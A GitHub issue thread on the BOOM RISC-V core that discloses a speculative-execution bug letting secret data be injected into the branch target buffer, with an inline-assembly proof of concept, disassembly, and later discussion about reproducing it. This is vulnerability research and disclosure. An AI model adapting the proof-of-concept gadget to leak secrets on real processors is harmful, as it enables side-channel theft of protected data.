riscv-boom/riscv-boom #699: [Bug Report] Leak secret data through Speculative BTB Injection

Phantom1003, 2024-08-05:
**Type of issue**: bug report 
**Impact**: rtl refactoring
**Development Phase**: proposal

Hi, our transient execution bug fuzzer found a new spectre variant on BOOM that can inject secret data into the BTB and uBTB during the transient execution.

In the given case, the first part of the code involves a series of floating-point operation instructions designed to generate a computation result with a long latency.
This is followed by a load instruction, which is expected to cause a misaligned memory exception. Since the base address depends on the result of the preceding floating-point operations, subsequent instructions are executed out of order.

In the second part, the secret value is accessed and used to calculate a mask. 

The next part involves a return instruction, causing a misprediction because there is no valid return address in the RSB. Due to the presence of the bug, this misprediction is forwarded to the ROB, causing the RoB to clear the suppression generated by the previous unaligned exception, allowing execution to continue.

Finally, the secret value is injected into the Branch Target Buffer (BTB) through a series of no-operation instructions (or ra, t0, t4), aligned to cause another misprediction, similar to BOOMbard.

```c
  uint64_t dummy1 = 16;
  uint64_t dummy2 = 2;

  asm("li  t1, 0x80004000\n"                // secret is at 0x80004000
      "fcvt.s.lu	fa5, %[dummy1]\n"    // Part I: trigger OoO execution
      "fcvt.s.lu	fa4, %[dummy2]\n"
      "fdiv.s	fa5, fa5, fa4\n"
      // ...
      "fcvt.lu.s	t5, fa5, rtz\n"
      "addi t5, t5, 1\n"
      "lw t0, 0(t5)\n"   // misaligned exception, trigger OoO execution
      "lb t0, 0(t1)\n"   // Part II: access secret
      "andi t4, t0, 1\n"
      "sub t4, x0, t4\n"
      "auipc t0, 0\n"    // Part III: use a misprediction to clear exception 
      "or ra, t0, t4\n"
      "jalr x0,	12(ra)\n" // misprediction, since no valid record in RSB
      "auipc t0, 0\n"    // Part IV: inject secret to BTB
      "or ra, t0, t4\n"  // nop instruction to align misprediction
      "or ra, t0, t4\n"  // update and exception commit
      // ...
      "or ra, t0, t4\n"
      "or ra, t0, t4\n"
      "jalr x0,	12(ra)\n" // misprediction, since no valid record in RSB
      :: [dummy1] "r" (dummy1),
         [dummy2] "r" (dummy2));
```

In the waveform, the BPD received an update event triggered by the do_commit_update signal. The source address was the instruction address of the misaligned exception, and the destination address was the exception handler function. In short, BOOM incorrectly updated the BTB for the exception instruction.

[image]

```
    800010ce:	    0f05                	add	t5,t5,1
    800010d0:	    000f2283          	lw	t0,0(t5)
    800010d4:	    00030283          	lb	t0,0(t1)

0000000080000114 <trap_entry>:
    80000114:	34002173          	csrr	sp,mscratch
```

[specbtb.zip](https://github.com/user-attachments/files/16493190/specbtb.zip)

**Please tell us about your environment:**
    - version: 22bb6f42

> @zhouyangye1076 helps reproduce the bug

jerryz123, 2024-08-08:
Thanks for the detailed report and analysis. These kinds of microarchitectural vulnerabilities are always interesting to read about.

I'm not aware of anyone using BOOM in a security-sensitive setting, so I'm not yet motivated to fix these.
Indeed, leaving these vulnerabilities in-place should actually be more useful, as it serves as a demonstration of how common microarchitecture techniques inadvertently introduce side channels.

Let's leave this issue open, so any future readers can find this easily

tcyba, 2025-06-15:
Hello, I would like to ask, when I reproduce the attack, the following error is reported. What is the problem? Can you help me solve it?

For the missing encoding.h file:

[image]

For the missing encoding.h file:

[image]

Modified the content of MAKEFILE:

[image]

Then compile again and get error 'DRAM_BASE' undeclared, this problem is still being solved. It should be the missing constant value.

[image]

Modified MAKEFILE and added two DDRAM_BASE addresses

[image]

After successful compilation:

[image]

The current test results show: warning: tohost and fromhost symbols not in ELF; can't communicate with target. I am also trying to solve this problem, but I don't know if it will affect the results.

[image]

Could you please check if my reproduction of the attack process is correct? Are there any issues? I wasn't able to successfully obtain the waveform. Thank you very much!

Phantom1003, 2025-06-15:
Ops, nice catch. I'm not entirely certain if the provided test case can run directly on Chipyard, as we've integrated some custom CSRs. While Chipyard serves as an excellent framework for prototyping, it can be quite complex for microarchitecture studies. You need to use Starship [1] to execute the test case. I believe you've already set up the relevant macros correctly (btw you can also use the binary located in the testcase/ directory). You need to compare the results with the wave file to determine if the attack was successful.  We've already released the artifact, please check it out [2].

1. https://github.com/sycuricon/starship-dejavuzz
2. https://github.com/sycuricon/DejaVuzz

tcyba, 2025-06-15:
Ok, I'll look into it, thank u.